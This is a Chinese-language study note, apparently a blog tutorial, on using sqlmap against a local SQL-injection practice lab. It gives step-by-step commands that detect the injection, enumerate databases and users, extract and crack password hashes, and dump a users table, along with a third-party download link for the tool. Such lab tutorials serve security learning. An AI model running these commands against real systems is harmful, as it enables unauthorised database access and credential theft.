SQLmap

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

Sqlmap安装包:链接:https://pan.baidu.com/s/1p533gyUcCIPvGuxnwJhAPA&shfl=sharepset
提取码:8ad4

SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
方法:打开sqlmap输入Python sqlmap.py -u +url
1、指定目标注入地址)检测出存在可利用漏洞
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”

SQLmap
SQLmap
2、曝出所有数据库名称:–dbs:dbs前面有两条杠
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --dbs

SQLmap
3、web当前使用的数据库
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --current-db

SQLmap
4、列出当前数据库里所有的用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --users

SQLmap

5、列出当前数据库里的当前用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–current-user

SQLmap
6、列出当前数据库里账户名,密码
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–passwords

SQLmap

sqlmap已经做了MD5解密

SQLmap

7、列出数据库中的表参数:(-D:指定数据库名称 --tables:列出表)
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security --tables

SQLmap

8、列出表中字段 (-D:指定数据库名称;-T:指定要列出字段的表;–columns:指定表的所有列 )
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”-D security -T users --columns

SQLmap
9、列出三个数据列中所有的数据: (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security -T users -C id,username,password --dump

SQLmap